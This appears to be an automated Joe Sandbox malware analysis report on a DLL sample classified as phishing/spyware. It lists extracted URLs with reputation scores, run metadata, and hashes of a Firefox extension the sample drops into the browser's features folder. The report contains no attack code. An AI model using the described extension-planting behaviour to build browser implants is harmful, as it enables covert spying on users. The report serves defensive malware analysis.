https://schema.org0%URL Reputationsafe
https://drive-daily-1.corp.google.com/0%URL Reputationsafe
https://drive-daily-5.corp.google.com/0%URL Reputationsafe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield0%URL Reputationsafe
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-1520%URL Reputationsafe
https://mitmdetection.services.mozilla.com/0%URL Reputationsafe
https://static.adsafeprotected.com/firefox-etp-js0%URL Reputationsafe
https://drive-preprod.corp.google.com/0%URL Reputationsafe
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%0%URL Reputationsafe
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f0%URL Reputationsafe
https://monitor.firefox.com/user/breach-stats?includeResolved=true0%URL Reputationsafe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report0%URL Reputationsafe
https://monitor.firefox.com/user/dashboard0%URL Reputationsafe
https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID0%URL Reputationsafe
https://monitor.firefox.com/about0%URL Reputationsafe
http://schema.org0%URL Reputationsafe
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-0%Avira URL Cloudsafe
https://coverage.mozilla.org0%URL Reputationsafe
https://searchfox.org/mozilla-central/rev/f40d29a11f2eb4685256b59934e637012ea6fb78/gfx/cairo/cairo/s0%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=16745870%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=11811260%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=12509070%Avira URL Cloudsafe
https://stackoverflow.com/a/32724723.0%Avira URL Cloudsafe
https://clients85.google.com/service/update2/crx0%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=12898080%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=12509070%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=16745870%VirustotalBrowse
https://searchfox.org/mozilla-central/rev/f40d29a11f2eb4685256b59934e637012ea6fb78/gfx/cairo/cairo/s0%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=11451570%Avira URL Cloudsafe
https://stackoverflow.com/a/32724723.0%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=14251660%Avira URL Cloudsafe
https://docs.google.com/0%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=12898080%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=13151990%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=11451570%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=14251660%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=13750060%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=11811260%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=17242540%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=14140390%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=13151990%VirustotalBrowse
https://html.spec.whatwg.org/multipage/microdata.html#values0%Avira URL Cloudsafe
https://www.google.com/?h=tyjjeh2ogi3qqdrbygpj96fo04sd8rncm8xt.gg4fdx0u7lease0%Avira URL Cloudsafe
https://docs.google.com/0%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=17242540%VirustotalBrowse
https://www.amazon.com/exec/obidos/external-search/0%Avira URL Cloudsafe
http://certs.godaddy.com/repository/0%Avira URL Cloudsafe
http://certificates.starfieldtech.com/repository0%Avira URL Cloudsafe
https://html.spec.whatwg.org/multipage/microdata.html#values0%VirustotalBrowse
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-0%VirustotalBrowse
https://www.amazon.com/exec/obidos/external-search/0%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=13433050%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=13750060%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=14296360%Avira URL Cloudsafe
https://search.avast.com/AV752/0%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=16912270%Avira URL Cloudsafe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=13433050%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=12056510%Avira URL Cloudsafe
https://search.avast.com/AV752/0%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=14140390%VirustotalBrowse
https://www.google.com/?h=bq2w5i6ru5np2fu3rd3eltwiyje2l6w8844g.mq7doifak0%Avira URL Cloudsafe
http://certs.godaddy.com/repository/0%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=16912270%VirustotalBrowse
https://duckduckgo.com/?q=0%Avira URL Cloudsafe
https://chrome.google.com/webstore0%Avira URL Cloudsafe
https://payments.google.com/payments/v4/js/integrator.js0%Avira URL Cloudsafe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
https://duckduckgo.com/?q=0%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=14296360%VirustotalBrowse
https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes0%Avira URL Cloudsafe
https://github.com/mozilla/gcp-ingestion/blob/master/docs/edge.md#postput-request0%Avira URL Cloudsafe
https://payments.google.com/payments/v4/js/integrator.js0%VirustotalBrowse
http://certificates.starfieldtech.com/repository0%VirustotalBrowse
https://groups.google.com/forum/#0%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=17096660%Avira URL Cloudsafe
https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes0%VirustotalBrowse
https://chrome.google.com/webstore0%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=14331180%Avira URL Cloudsafe
https://bugzilla.mozilla.org/show_bug.cgi?id=12056510%VirustotalBrowse
https://bugzilla.mozilla.org/show_bug.cgi?id=14370380%Avira URL Cloudsafe
https://www.maps.google.com/a/place0%Avira URL Cloudsafe
https://github.com/mozilla/gcp-ingestion/blob/master/docs/edge.md#postput-request0%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://bugzilla.mozilla.org/show_bug.cgi?id=1674587omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://searchfox.org/mozilla-central/rev/f40d29a11f2eb4685256b59934e637012ea6fb78/gfx/cairo/cairo/somni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1250907omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1181126omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://stackoverflow.com/a/32724723.omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://clients85.google.com/service/update2/crxmanifest.json.3.drfalse
  • Avira URL Cloud: safe
unknown
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.prefs.js_tempHROxPC.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1289808omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://merino.services.mozilla.com/api/v1/suggestomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1145157omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protectomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1425166omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://docs.google.com/rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1315199omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://screenshots.firefox.comomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1375006omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1724254omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-reportomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://ads.stickyadstv.com/firefox-etprundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747461262.000000000339B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691435396.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691413102.00000000033A5000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tabomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1414039omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://monitor.firefox.com/breach-details/omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEMomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://html.spec.whatwg.org/multipage/microdata.html#valuesomni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.google.com/?h=tyjjeh2ogi3qqdrbygpj96fo04sd8rncm8xt.gg4fdx0u7leaserundll32.exe, 00000004.00000003.1742442383.0000000002CE7000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.amazon.com/exec/obidos/external-search/rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://certs.godaddy.com/repository/omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://certificates.starfieldtech.com/repositoryomni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1343305omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1429636omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://search.avast.com/AV752/omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://tracking-protection-issues.herokuapp.com/newomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-reportomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1691227omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94prefs.js_tempHROxPC.3.drfalse
  • Avira URL Cloud: safe
unknown
https://chromium.googlesource.com/chromium/src/omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1205651omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.google.com/?h=bq2w5i6ru5np2fu3rd3eltwiyje2l6w8844g.mq7doifakrundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748431003.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748391683.0000000003385000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp, Secure Preferences.3.drfalse
  • Avira URL Cloud: safe
unknown
https://duckduckgo.com/?q=omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-reportomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://chrome.google.com/webstorerundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://drive-daily-2.corp.google.com/rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://payments.google.com/payments/v4/js/integrator.jsrundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://fpn.firefox.comomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protectionsomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaprefs.js_tempHROxPC.3.drfalse
  • Avira URL Cloud: safe
unknown
https://schema.orgomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesomni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://drive-daily-1.corp.google.com/rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://github.com/mozilla/gcp-ingestion/blob/master/docs/edge.md#postput-requestomni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://drive-daily-5.corp.google.com/rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://groups.google.com/forum/#omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shieldomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1709666omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1433118omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1437038omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://www.maps.google.com/a/placeomni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1678378omni.ja.bak.3.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://mitmdetection.services.mozilla.com/omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://chrome.google.com/webstoreCrundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://static.adsafeprotected.com/firefox-etp-jsrundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662076222.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662227982.0000000002CB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://certs.starfieldtech.com/repository/omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/mozilla-services/mozilla-pipeline-schemasomni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://searchfox.org/mozilla-central/search?q=search-telemetry-schema.jsonomni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://drive-preprod.corp.google.com/rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%omni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1392378omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-fomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://sandbox.google.com/rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1334069omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://www.google.com/?h=6fiz7bk1dli28pjdzprzc2iifgzk4e22xjoo.ja7lk70wrrundll32.exe, 00000004.00000003.1742442383.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748301069.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1379974omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1465399omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://ipfs.io/ipfs/QmXoypizjW3WknFiJnKLwHCnL72vedxjQkDDP1mXWo6uco/wiki/List_of_Google_domains.htmlomni.ja.bak.3.drfalse
  • Avira URL Cloud: phishing
unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_romni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
http://certificates.godaddy.com/repositoryomni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://monitor.firefox.com/user/breach-stats?includeResolved=trueomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-reportomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://deploy-preview-1234--perf-html.netlify.comomni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1309305omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1458321omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://monitor.firefox.com/user/dashboardomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
http://mozilla.org/foo/bar/bomni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://opengraphprotocol.org/)omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_IDomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1719704omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1263733omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1688277omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://monitor.firefox.com/aboutomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
http://mozilla.org/MPL/2.0/.omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
http://schema.orgomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1539007omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://coverage.mozilla.orgomni.ja.bak.3.drfalse
  • URL Reputation: safe
unknown
https://deploy-preview-1234--perf-html.netlify.com/omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://sandbox.google.com/payments/v4/js/integrator.js8rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1436524omni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown
https://deploy-preview-1234567--perf-html.netlify.appomni.ja.bak.3.drfalse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1502263
Start date and time:2024-08-31 21:58:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 56s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:GqjUrFW.dll
Detection:MAL
Classification:mal84.phis.spyw.winDLL@10/143@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .dll
  • Stop behavior analysis, all processes terminated

Warnings

  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 142.250.185.170, 142.250.74.202, 142.250.184.202, 172.217.16.202, 142.250.185.138, 216.58.206.42, 142.250.186.170, 142.250.185.202, 142.250.185.234, 172.217.18.10, 142.250.186.42, 142.250.186.74, 142.250.184.234, 142.250.185.106, 216.58.206.74, 142.250.181.234
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, www.googleapis.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
15:58:59API Interceptor1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpi

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):656934
Entropy (8bit):4.833443692601012
Encrypted:false
SSDEEP:6144:AZesRBvWTxOdD/xwa4+5DB4g3WdEahAGNdYpw516j:ALyqdElHCj
MD5:B1BCDCB19FA86C839994BC26C6789A1E
SHA1:0D83BD1A08B94BC48934D25DFCDC58BEA826D125
SHA-256:A3485D48EAC6B7DFE15E9EFD2FFC8976BFD765704477022841F84FAEC35507A1
SHA-512:6C6CCAE35B0D58E6ACA5826A4F1931E78BA9C3426C63B5CCFE38667B40D5852FD7281ACDE1964AE8D194AB760EA20A039509EBB2CC2A191BD8C4450B49D2CB40
Malicious:false
Reputation:low
